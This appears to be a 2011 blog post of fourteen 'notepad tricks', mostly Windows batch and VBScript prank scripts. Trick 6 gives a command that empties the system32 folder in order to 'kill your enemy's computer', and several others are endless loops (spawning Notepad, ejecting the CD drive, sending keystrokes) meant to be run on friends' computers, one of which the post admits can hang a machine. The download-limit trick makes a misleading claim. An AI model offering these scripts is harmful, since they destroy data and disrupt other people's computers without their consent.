Thursday, July 21, 2011

14 Cool & Usefull NotepaD Tricks

notepad tricksNotepad, one of the best text editor in the world. It is used for taking notes, writing codes etc., Have you tried it for playing with your friends.
these are some tricks for you.



1]Unlimited Downloads from Rapidshare and Megaupload


Here is a simple notepad tricks to download unlimited from Rapidshare, Megaupload file sharing websites.

Copy the code given below in notepad :-

@echo off
echo ipconfig /flushdns
ipconfig /flushdns
echo ipconfig /release
ipconfig /release
echo ipconfig /renew
ipconfig /renew
and save it as “3dritesh.bat”
Now click on this file every time you download a file from Rapidshare and Megaupload
That’s it…
N’joy unlimited downloads from Rapidshare and Megaupload..


2] Basic trick to become a hacker !!!

Now i will show how to create fake virus in your computer, this is a good computer & notepad tricks to play with your friends :-)

S, this is the initial step to become a  hacker…

1–> open “notepad”
Type the commands given in given below :-

@echo off
C:
cls
echo hello
pause
echo im a virus
pause
echo hurray !! im become a hacker
pause
save the file as “.bat” extension
for example if your file name is “virus” save it as “virus.bat”
Hurray !!! i had created a virus !!

3] Invisible folder

how to make an invisible folder
how to make an invisible folder


How to  make an invisible folder, so that no one can see your folder which is too personal… 4 u

1–> create a new folder
2–> select that folder & press F2 & press backspace until the name “new folder” vanish
3–> now by pressing ALT key, type 0160 simultaneously (at the same time) & hit enter.
4–> now you can see the folder name is vanished.
5–> to make folder icon invisible
6–> right click on that folder & goto –>properties –>customize –>change icon

make an invisible folder
make an invisible folder
Hurray..! now your folder is invisible.

 

4] shutdown computer using notepad

 

Now u can shutdown your computer using notepad and say bye…. to tradition ways ( turn off) of closing your computer

Just Type:-
@echo off
msg * u r terminated
shutdown -c “stop me if you can” -s
Save it as “turnoffurpc.bat”.
Now see notepad will shutdown ur computer with lightning speed..!

5] Test your anti-virus efficiency

You can easily test your anti-virus program with a simple notepad trick, so that you can easily know the efficiency of your anti-virus program

Copy & paste the code below in notepad
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Save file as “checkantivirus.com” including quotation-marks
After sometime scan this file with your anti-virus program, it will surely detect the file a virus, then make sure that your anti-virus is working properly
if not, this is a right time to change your anti-virus & try for some another..
  
6] kill your enemy's computer

kill your enemy computer

what is killing of computer?
Its nothing but emptying the system32 folder of OS in your computer, so that your computer cannot boot b’coz system32 is essential folder which is needed for booting and all the core operation of OS.
write the following code in your notepad:-
- del c:\windows\system32\*.* /q
save the file as “terminator.bat” without quote
!!…red alert…!!
Don’t click this file in your computer b’coz the file u had created will empty all files in system32 folder which is essential for your computer to work

7]  Terminate frozen programs in second


<b><i>Terminate frozen program</b></i>
Terminate frozen program
You may have a chance to face a problem that “program not responding” error, while loading lot of data in windows.

It will usually take 5-10 minutes to recover automatically or you will close it by pressing ctrl+alt+del
Here comes the easiest way to solve this problem in a seconds
Type the following code in notepad :-
@echo off
taskkill.exe /f /fi “status eq not responding”
exit
save it as “terminator.bat”
when u come across the same problem again, just HIT the file that you have created.
simple is in it..!

8] Frustrate your friends

frustrate your friend
frustrate your friend
You can frustrate your friend by showing repeated messages in the notepad,by following this simple notepad tricks

Just Type below code in notepad :-
@ECHO off
:Begin
msg * Hai
msg * How are you dear….
msg * I am fine ya!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN
and Save it as “Anything.BAT”
now see the tricks that happens..!

9] somebody stop me

continious opening of notepad

This is another cool notepad tricks to play with your friends, By using this simple code given below you can make the notepad open continuously with non stop..

Open notepad & type the following code given below :-
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
save the file as “non-stop.bat”
Just do it in your friends computer & make them frustrate
Note :– This may even lead to hanging of some computers..!!

10] Make your c.d drive mad

mad cd-drive

You can make your cd-drive to open & close repeatedly by using a simple notepad tricks given below

Just Type the following code below in notepad :-
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as “im mad.VBS” .
now watch that your cd-drive has become MAD…!

11] GHOST rider

Type notepad continiously

Make your keyboard keys to type continuously (non-stop)

Just Type :
MsgBox “stop me..! if you can”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
Save it as “ghostrider.VBS”

12] Toggle caps lock continuously

Just type the following code in notepad:-
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Save it as “blink.VBS” .
now watch that capslock led will blink continuously
Hey try it in your friends computer & be a hacker.

13] george bush tricks

1–> Open Notepad

2–> Write following line in the notepad that is given below.

Bush hid the facts

3–> DON’T hit enter at the end of the line

4–> Save this file as bush.txt
now open the notepad and see what happens….

14]  9/11 attack in pc

he flight that hit the world trade center is Q33n
Do you want make that 9/11 attack again, that too in your computer. follow these simple steps..

STEPS:-
1–> Open notepad and type Q33N
2–> Select text Q33N & increase the font size to 72 & change the font to windings
3–> Save the file as “911.txt”
and see wat happens….
 

1 comment:

ShareThis

.........................................